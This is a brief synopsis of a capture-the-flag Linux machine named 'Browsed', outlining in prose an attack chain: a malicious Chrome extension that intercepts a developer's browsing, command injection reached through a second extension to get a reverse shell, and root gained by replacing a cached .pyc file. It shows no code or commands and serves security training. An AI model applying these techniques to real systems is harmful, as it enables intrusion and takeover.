Machine Synopsis

`Browsed` is a medium-difficulty Linux machine centred around abusing browser extension functionality to access internal services. By uploading a malicious Chrome extension, we intercept a developer’s browsing activity and uncover an internal Gitea instance hosting a Flask application. Source code analysis reveals a command injection vulnerability in a bash script exposed via a localhost-only endpoint, which we exploit by delivering a second extension to trigger the payload through the developer’s browser and obtain a reverse shell as user `larry`. For privilege escalation, the machine demonstrates insecure handling of Python bytecode: writable access to the `__pycache__` directory allows replacing a trusted `.pyc` file, resulting in arbitrary code execution as root.